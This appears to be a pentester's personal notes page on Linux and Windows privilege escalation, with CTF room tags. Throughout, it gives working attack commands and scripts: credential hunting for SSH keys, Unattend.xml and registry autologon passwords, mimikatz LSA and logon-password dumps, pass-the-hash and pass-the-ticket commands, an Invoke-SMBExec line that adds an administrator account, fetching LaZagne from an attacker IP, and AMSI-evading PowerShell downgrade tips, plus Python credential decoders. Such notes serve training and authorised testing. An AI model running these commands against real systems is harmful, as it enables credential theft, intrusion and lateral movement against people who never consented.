Red Team - Fourth step - Privilege Escalation

operatingsystemsecurity adventofcyber2

Privilege Escalation 🔑 is the fourth step of the pentester's activities. We attempt to escalate from a regular user to an administrative account by exploiting a vulnerability or misconfiguration in the system.

This is an important step: without it we may not have enough privileges to access data, leave a backdoor, or carry out most post-exploitation tasks.

We want to reach the account with the highest level of privileges:

  • root > sudoers > [...] on Linux
  • NT AUTHORITY\SYSTEM > Administrator > [...] on Windows

Escalation can be horizontal/lateral (another user with the same level of privileges) or vertical (a higher level of privileges).

Learn 🎓

Tools


Privilege Escalation Basics

linuxprivilegeescalation windows_privilege_escalation linprivesc commonlinuxprivesc commonlinuxprivesc adventofcyber2 windowsprivesc20

Each operating system has its own set of escalation vectors, though they share similarities. The common starting point is to gather information about the environment.

  • User information 🧑: it may be used to determine your level of access and your role, along with the username naming convention

  • Host information 💻: it may be used to find well-known vulnerabilities or misconfigurations (OS, kernel version, patch level).

  • Network information 🌍: from the outside we usually saw only a portion of the internal network. We may find that the host runs an FTP server only reachable from the inside. The ARP cache and the routing tables are also worth a look.

Additionally, look for folders where you can download and run scripts, and check the machine configuration (architecture, available interpreters, compilers) so you can set them up properly.

I compiled a list of handy commands per operating system:

You will also have to look for installed tools and applications along with their versions. You will need this information to look for CVEs and exploits related to local privilege escalation.
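As an added example (my code, not part of the original notes), here is the network-information step done without the `ip`, `route` or `arp` binaries, which are often missing in a restricted shell: read `/proc/net/route` and `/proc/net/arp` directly. The two samples are constructed, a Linux target is assumed, and `live_summary()` runs the same parsing on the real files.

```python
import ipaddress
import socket
import struct

# Constructed samples (not captured from a real host) of /proc/net/route and
# /proc/net/arp. In /proc/net/route the address fields are hex in host byte
# order, i.e. little-endian on x86, so 01000A0A is 10.10.0.1.
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t01000A0A\t0003\t0\t0\t100\t00000000\t0\t0\t0\n"
    "eth0\t00000A0A\t00000000\t0001\t0\t0\t100\t00FFFFFF\t0\t0\t0\n"
    "eth1\t0000A8C0\t00000000\t0001\t0\t0\t0\t0000FFFF\t0\t0\t0\n"
)
SAMPLE_ARP = (
    "IP address       HW type     Flags       HW address            Mask     Device\n"
    "10.10.0.1        0x1         0x2         00:50:56:aa:bb:01     *        eth0\n"
    "192.168.5.20     0x1         0x2         00:50:56:aa:bb:20     *        eth1\n"
    "192.168.5.254    0x1         0x0         00:00:00:00:00:00     *        eth1\n"
)


def _hex_to_ip(field):
    """Convert a little-endian hex field from /proc/net/route to a dotted quad."""
    return socket.inet_ntoa(struct.pack("<I", int(field, 16)))


def parse_routes(text):
    """Return (iface, network, gateway) per entry; the default route is 0.0.0.0/0."""
    routes = []
    for line in text.splitlines()[1:]:          # skip the header line
        fields = line.split()
        if len(fields) < 8:
            continue
        iface, dest, gateway, mask = fields[0], fields[1], fields[2], fields[7]
        network = ipaddress.ip_network(f"{_hex_to_ip(dest)}/{_hex_to_ip(mask)}", strict=False)
        routes.append((iface, str(network), _hex_to_ip(gateway)))
    return routes


def internal_networks(text):
    """Directly attached networks (no gateway): candidates for pivoting and
    internal scanning, typically invisible from the outside."""
    return [(iface, net) for iface, net, gw in parse_routes(text) if gw == "0.0.0.0"]


def arp_neighbours(text):
    """Return (ip, mac, iface) for complete ARP entries (flags bit 0x2), i.e.
    hosts that recently exchanged traffic with this machine."""
    hosts = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 6 and int(fields[2], 16) & 0x2:
            hosts.append((fields[0], fields[3], fields[5]))
    return hosts


def live_summary():
    """Same parsing on the real files of the host this runs on (Linux only)."""
    try:
        with open("/proc/net/route") as routes, open("/proc/net/arp") as arp:
            return internal_networks(routes.read()), arp_neighbours(arp.read())
    except OSError:
        return [], []


if __name__ == "__main__":
    print("internal networks:", internal_networks(SAMPLE_ROUTE))
    print("neighbours:", arp_neighbours(SAMPLE_ARP))
```

The `192.168.0.0/16` on `eth1` in the sample is the kind of network you never saw from the outside; the ARP table then tells you which hosts on it are actually alive and talking to this box.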


Linux privilege escalation 🦆

linuxprivilegeescalation linprivesc commonlinuxprivesc commonlinuxprivesc adventofcyber2 linux_privilege_escalation

Linux privilege escalation may be achieved by exploiting:

External tools/services

⚠️ Don't forget hidden files. Compiled Recipe.

There are many automated scripts that investigate the usual places, services, files... that you may want to look at. You will still have to understand the output and dig into it.

  • linPEAS (15.9k ⭐ | shell script)
  • LinEnum (7.0k ⭐ | shell script | 2020 🪦)
  • traitor (6.5k ⭐ | go script compiled to binary | 2022 ☠️)
  • linux-smart-enumeration a.k.a. LSE (3.0k ⭐ | shell script)
  • linuxprivchecker (1.6k ⭐ | python script | 2021 🪦)
  • pwncat-cs (2.3k ⭐ | reverse shell with priv. esc. suggester | 2022 ☠️)

Additional references

Special escalation vectors

ctf

  • The MOTD shown at SSH login is generated by the scripts under /etc/update-motd.d/ (e.g. 00-header), which are executed as root; one of them sourced a script that we could edit, so anything written there ran as root at the next login.
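Generalizing the MOTD case above, here is an added check (my example, not from the original notes) that flags root-executed hook scripts whose own file, or a helper they reference by absolute path, is world-writable. The directory list is an assumption for a Debian/Ubuntu-style host and the tree built by `demo()` is constructed; on a real target call `find_writable_root_hooks()` with no arguments.

```python
import os
import re
import stat
import tempfile

# Directories whose scripts run as root (MOTD hooks at SSH login, cron).
# Assumption: Debian/Ubuntu layout; extend the list for the target.
ROOT_RUN_DIRS = ["/etc/update-motd.d", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily"]

# Absolute paths mentioned inside a hook: helpers it sources or executes.
_ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def world_writable(path):
    """True if any local user can modify the regular file at `path`."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def referenced_files(script):
    """Existing files whose absolute path appears in the script body."""
    try:
        with open(script, errors="replace") as fh:
            body = fh.read()
    except OSError:
        return []
    return [p for p in _ABS_PATH.findall(body) if os.path.isfile(p)]


def find_writable_root_hooks(dirs=ROOT_RUN_DIRS):
    """Return (hook, writable file) pairs: a hook is exploitable if its own
    file, or a file it references (e.g. a script it sources), is writable."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            hook = os.path.join(d, name)
            if not os.path.isfile(hook):
                continue
            for target in [hook] + referenced_files(hook):
                if world_writable(target):
                    findings.append((hook, target))
    return findings


def demo():
    """Constructed tree: 00-header sources a world-writable helper (the
    vulnerable case), 10-uname references nothing writable. Returns the
    findings as (hook name, writable file name)."""
    root = tempfile.mkdtemp()
    motd = os.path.join(root, "update-motd.d")
    os.mkdir(motd)
    helper = os.path.join(root, "header.sh")
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\necho 'Welcome'\n")
    os.chmod(helper, 0o777)                     # the misconfiguration: anyone can edit it
    with open(os.path.join(motd, "00-header"), "w") as fh:
        fh.write(f"#!/bin/sh\n. {helper}\n")   # sourced by a root-run hook
    with open(os.path.join(motd, "10-uname"), "w") as fh:
        fh.write("#!/bin/sh\nuname -a\n")
    for hook in ("00-header", "10-uname"):
        os.chmod(os.path.join(motd, hook), 0o755)
    found = find_writable_root_hooks([motd])
    return [(os.path.basename(h), os.path.basename(t)) for h, t in found]


if __name__ == "__main__":
    print("demo:", demo())
    print("this host:", find_writable_root_hooks())
```

The check uses the mode bits rather than `os.access()`, so it gives the same answer whether you run it as root or as the low-privileged user; a finding means any user could have planted a reverse shell in that file.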

Windows privilege escalation 🪟

windows_privilege_escalation adventofcyber2 windowsprivesc20 windows_privilege_escalation

Windows privilege escalation may be achieved by exploiting:


Additional references

As on Linux, there are many automated scripts that investigate the usual places, services, files... that you may want to look at. You will still have to understand the output and dig into it.

  • WinPeas (15.9k ⭐ | binary | Download and Run .\winPEASany_ofs.exe)
  • Seatbelt (3.7k ⭐)
  • PrivescCheck (2.9k ⭐ | powershell script)
  • JAWS (1.7k ⭐ | 2020 🪦)
  • SharpUp (1.2k ⭐ | C# port of PowerUp)
  • PowerSploit (11.2k ⭐ | powershell script | 2017 🪦 | This is the latest home of PowerTools and PowerUp, which have also been dead since 2014/2015).
PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
PS> powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

Credential Hunting

password_attacks windows_privilege_escalation linuxprivilegeescalation adventofcyber2 linuxprivesc windowsprivesc20 breachingad

Look for credentials, and try password/key reuse wherever you can.

  • 🔑 Passwords, passphrases
  • 🎫 Tickets (ex: Kerberos), tokens (ex: Git), keys (ex: SSH)

Common places to dig for credentials are:

  • 🔍 command history (ex: ~/.bash_history, *hist*)
  • 🌍 browser history, saved passwords, etc.
  • 🛣️ application (.ppk, .rdp, .sdtid) and system logs (/var/log/)
  • 🐚 backups (.old, .bak, xxx~...)
  • ✉️ conversations/mails (/var/mail/)
  • 🌳 configurations (.env, .ini/.config/.cfg/.conf/.cnf, .sql)
  • 🤖 scripts and tasks (.sh/.ps1/.bat, cronjob)
  • 👜 check the registry (Windows, privilege required)
  • 💎 Databases (.*db*), Password Managers, Files
  • ...

Manually dig for interesting or unexpected files

  • /: look for unexpected folders in /
  • /root/: test if administrator home is readable
  • ~/Desktop: look for documents, passwords...
  • ~/Documents: look for documents, passwords...
  • %appdata%: look for sensitive applications data

Always put yourself in the target's shoes.

Automated Tools To Find Credentials

password_attacks windows_privilege_escalation

You can use LaZagne (9.5k ⭐).

PS> wget http://IP:port/LaZagne.exe -UseBasicParsing -OutFile LaZagne.exe
PS> .\LaZagne.exe all

You can use Snaffler (2.0k ⭐) to find juicy files on your host and every available share on the network.

PS> Snaffler.exe -s -d domain -o snaffler.log -v data
<# press Enter multiple times if stdout seems stuck #>

You can use SessionGopher (1.2k ⭐, 2018 🪦).

PS> Import-Module .\SessionGopher.ps1

You can use MailSniper (2.9k ⭐, 2022 🪦) for automated scans of sensitive information in a Microsoft Exchange environment.

You can use truffleHog (16.0k ⭐) for GIT repositories.

Linux CredHunting Notes

password_attacks linuxprivilegeescalation pivoting_tunneling_port_forwarding linuxprivesc ignite chillhack techsupp0rt1 validation

You often find interesting files in easy CTFs using:

$ find / -user $(whoami) -type f 2>/dev/null | grep -v /proc | grep -v /sys
$ find / -type f -writable 2>/dev/null | grep -v /proc | grep -v /sys

Find credentials, keys, tokens, passwords:

$ find / -name .ssh 2> /dev/null
$ find / -name "*id_rsa*" 2> /dev/null              # quote the glob so the shell doesn't expand it
$ grep -rnw "PRIVATE KEY" / 2>/dev/null | grep ":1:" # private keys (header is on line 1)
$ grep -rnw "ssh-rsa" / 2>/dev/null | grep ":1:"     # public keys
$ find / -wholename "*.git/config" 2> /dev/null | xargs grep -H "url"

Look for web application sessions (+ in database):

$ cat /etc/php/X.X/cli/php.ini | grep 'session.save_path'
$ cat /etc/php/X.X/apache2/php.ini | grep 'session.save_path'
$ find / -name "SESSIONS.ser" 2> /dev/null

🔍 As root, check the Linux password history file /etc/security/opasswd (old password hashes kept by pam_unix/pam_pwhistory for the remember= option).

Windows CredHunting Notes

password_attacks windows_privilege_escalation pivoting_tunneling_port_forwarding windowsprivesc20 breachingad attacktivedirectory anthem

Read PowerShell console history:

PS> gc (Get-PSReadLineOption).HistorySavePath
PS> type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
CMD> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

List saved credentials by Windows:

PS> cmdkey /list
PS> # use 'admin' saved credentials to start cmd.exe
PS> runas /savecred /user:admin cmd.exe
PS> runas /savecred /user:admin "COMMAND HERE"

Some known locations:

# Internet Information Services (IIS) = the default web server
PS> type C:\inetpub\wwwroot\web.config | findstr connectionString
PS> type C:\Windows\Microsoft.NET\Framework64\vX.X.XXXXX\Config\web.config | findstr connectionString
# Windows Deployment Services / sysprep answer files (credentials of the admin who
# deployed the OS image to several hosts, referred to as "Unattended" installs)
PS> type C:\Unattend.xml
PS> type C:\Windows\Panther\Unattend.xml
PS> type C:\Windows\Panther\Unattend\Unattend.xml
PS> type C:\Windows\system32\sysprep.inf
PS> type C:\Windows\system32\sysprep\sysprep.xml
# VNC servers
# FileZilla
PS> type "C:\xampp\FileZilla Server\FileZilla Server.xml"
PS> type "C:\Program Files\FileZilla Server\FileZilla Server.xml"
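Added example for the Unattend/sysprep and IIS locations above (my code, not part of the original notes): sysprep answer files store a password as base64(UTF-16LE(password + element name)) unless `<PlainText>true</PlainText>`, so the value has to be decoded and the `Password` or `AdministratorPassword` suffix stripped; `web.config` keeps the database login in plain text inside `connectionString`. Both XML samples are constructed and every account name and password in them is made up.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sysprep answer file: an encoded AutoLogon password and a
# plain-text local account password.
SAMPLE_UNATTEND = """
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>UwB1AG0AbQBlAHIAMgAwADIANAAhAFAAYQBzAHMAdwBvAHIAZAA=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_deploy</Name>
            <Password>
              <Value>Deploy#2024</Value>
              <PlainText>true</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

# Constructed IIS web.config with a SQL login in the connection string.
SAMPLE_WEBCONFIG = """
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=SQL01;Database=app;User Id=app_sa;Password=Winter2024!"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""


def _local(tag):
    """Strip the XML namespace: '{urn:...}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value, element_name, plain_text):
    """Undo sysprep's encoding: base64(UTF-16LE(password + element name))."""
    if plain_text:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    return decoded[:-len(element_name)] if decoded.endswith(element_name) else decoded


def unattend_credentials(xml_text):
    """Return (username, cleartext password) for every password in the file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    creds = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in ("Password", "AdministratorPassword"):
            continue
        value = plain = None
        for child in elem:
            if _local(child.tag) == "Value":
                value = child.text or ""
            elif _local(child.tag) == "PlainText":
                plain = (child.text or "").strip().lower() == "true"
        if value is None and (elem.text or "").strip():
            value, plain = elem.text.strip(), True   # e.g. JoinDomain credentials: bare text
        if value is None:
            continue
        user = "Administrator" if name == "AdministratorPassword" else None
        for sibling in parents.get(elem, []):
            if _local(sibling.tag) in ("Username", "Name"):
                user = (sibling.text or "").strip()
        creds.append((user, decode_unattend_password(value, name, bool(plain))))
    return creds


def webconfig_credentials(xml_text):
    """Return (name, user, password, server) per connectionStrings/add entry."""
    out = []
    for add in ET.fromstring(xml_text).iter("add"):
        cs = add.get("connectionString")
        if not cs:
            continue
        kv = {}
        for part in cs.split(";"):
            if "=" in part:
                key, val = part.split("=", 1)
                kv[key.strip().lower()] = val.strip()
        out.append((add.get("name"), kv.get("user id") or kv.get("uid"),
                    kv.get("password") or kv.get("pwd"), kv.get("server") or kv.get("data source")))
    return out


if __name__ == "__main__":
    print(unattend_credentials(SAMPLE_UNATTEND))
    print(webconfig_credentials(SAMPLE_WEBCONFIG))
```

The suffix is the element name, which is why `AdministratorPassword` and `AutoLogon/Password` decode differently; the base64 is obfuscation, not encryption, which is the whole point of collecting these files.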

Some known registry keys/hives:

# Putty
PS> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS> reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
# Windows Autologon - Cleartext credentials
PS> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Show saved Wi-Fi network passwords:

PS> netsh wlan show profile
PS> netsh wlan show profile <profile_name> key=clear

Some users store sensitive data in the Sticky Notes database:

PS> ls $Env:localappdata/Packages/Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe/LocalState/plum.sqlite

Manually look for sensitive files:

CMD> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
CMD> where /R C:\ *.txt *.ini *.cfg *.config *.xml
CMD> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
PS> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Refer to these notes for SAM, LSA, Credential Manager and tickets:

mimikatz# vault::list
mimikatz# vault::cred
mimikatz# lsadump::lsa /patch
mimikatz# sekurlsa::dpapi
mimikatz# sekurlsa::logonpasswords
mimikatz# kerberos::list

Dig centrally deployed application:

📚 See also: PowerShell Secure String for encrypted passwords.

📚 Remember to look inside network shares too, including SYSVOL. Passwords may also be stored in the user description field:

PS> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} # PowerView

Pass-the-xxx

Pass-the-hash (pth)

password_attacks attacking_common_services active_directory_enumeration_attacks attacktivedirectory

There are some scenarios in which we got hold of a hash but haven't managed to crack it. We may try to use the hash directly.

Systems that still authenticate with NTLM instead of Kerberos may be vulnerable: NT hashes are not salted, so a hash captured on one host is the same on every other host and can be reused as-is.

⚠️ When a local administrator other than the built-in Administrator (RID 500) authenticates remotely, UAC remote restrictions hand them a filtered, non-elevated token, so pass-the-hash with such an account fails. Setting HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1 disables this restriction. The built-in Administrator is only filtered if FilterAdministratorToken is enabled (it is disabled by default).

⚠️ RDP pass-the-hash is not possible by default: Restricted Admin mode must be enabled, i.e. DisableRestrictedAdmin set to 0. For instance: reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f (administrative rights on the target required).

  • Protocol-specific tools (examples)
$ evil-winrm -i IP -u username -H "nthash" # WinRM protocol
$ nxc smb IP/32 -u username -d . -H nthash
$ xfreerdp  /v:IP /u:username /pth:nthash
$ remmina # create a config and scroll down to "hash"
$ impacket-psexec -hashes :nthash username@IP
$ impacket-secretsdump -just-dc-user example/administrator username@IP -hashes lmhash:nthash
  • We can use the popular Mimikatz tool on Windows.
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:example.com /run:cmd.exe
  • We can use the Invoke-TheHash (1.5k ⭐, 2018 🪦) script suite on Windows. We can use it to create a user on the target if we have admin access there; otherwise, pop a reverse shell.
PS> Import-Module .\Invoke-TheHash.psd1
PS> Invoke-SMBExec -Target IP -Domain xxx -Username xxx -Hash xxx -Command "net user xxx Password123 /add && net localgroup administrators xxx /add" -Verbose
PS> Invoke-WMIExec -Target DC01 -Domain xxx.xxx -Username xxx -Hash xxx -Command "cmd.exe"

Pass-the-ticket (ptt)

password_attacks active_directory_enumeration_attacks

Some authentication mechanisms, such as Kerberos, are based on tickets to authorize access to resources. Given a ticket that hasn't expired, we may be able to access interesting resources.

On Windows, a user can only access their own tickets, while an administrator can access every ticket on the computer.

  • We can use the popular Mimikatz tool, or Rubeus, on Windows.
mimikatz# kerberos::ptt ".\xxx@yyy.kirbi" # load ticket
PS> # Load the ticket in the current session
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>

What's next? 🐼 Depending on the ticket that was loaded, you may be able to run commands that you couldn't before. For instance:

PS> dir \\DC01.example.com\c$
PS> dir \\DC01.example.com\some_user_share
PS> dir \\DC01\some_user_share
PS> Enter-PSSession -ComputerName DC01

👻 To-do 👻

Stuff that I found, but never read/used yet.

Courses

Cheatsheet

Random

  • WADComs (1k ⭐)/wadcoms website
  • Metasploit PRO
  • Create custom modules, -m or loadpath to load them, doc
  • Test cracked credentials on any user

XXX

  • If AppLocker is in use, try alternative paths or alternative executables such as PowerShell_ISE.exe for PowerShell
  • PowerShell downgrade attack (powershell.exe -version 2; Get-Host) if multiple versions are present. PowerShell v2 has no script block logging and no AMSI.

Exploiting Services